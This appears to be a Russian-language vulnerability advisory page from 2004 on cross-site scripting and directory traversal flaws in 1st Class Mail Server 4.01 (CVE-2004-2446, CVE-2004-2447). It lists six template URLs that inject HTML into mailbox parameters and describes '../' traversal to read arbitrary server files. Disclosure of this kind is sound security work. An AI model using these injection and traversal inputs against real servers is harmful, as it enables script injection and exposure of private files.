Несколько уязвимостей в 1st Class Mail Server

Дата публикации:
11.04.2004
Всего просмотров:
835
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2004-2446
CVE-2004-2447
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие важных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
1st Class Mail Server 4.x
Уязвимые версии: 1st Class Mail Server 4.01

Описание: Несколько уязвимостей обнаружено в 1st Class Mail Server. Удаленный пользователь может просматривать файлы на системе. Удаленный пользователь может выполнить XSS нападение.

 
http://[host]/AUTH=[some_value]/user/viewmail.tagz?Site=www.hack.gr&Mailbox=3&MessageIndex=[html_code ]>
http://[host]/AUTH=[some_value]/user/?Site=www.hack.gr&Mailbox=[html_code]
http://[host]/AUTH=[some_value]/user/members.tagz?Site=www.hack.gr&Mailbox=[html_code]
ht tp://[host]/AUTH=[some_value]/user/general.tagz?Site=www.hack.gr&Mailbox=[html_code]
http://[host]/AUTH=[some_value]/user/advanced.tagz?Site=www.hack.gr&Mailbox=<[html_c ode]>
http://[host]/AUTH=[some_value]/user/list.tagz?Site=www.hack.gr&Mailbox=[html_code]
Также удаленный пользователь может использовать символы обхода каталога ‘../’ чтобы просмотреть произвольные файлы на системе с привилегиями Web сервера.

URL производителя:http://www.1cis.com/articles/1cms20pr.asp

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: 1st Class mail server 4.01 Directory Traversal and XSS vulnerabilities

или введите имя

CAPTCHA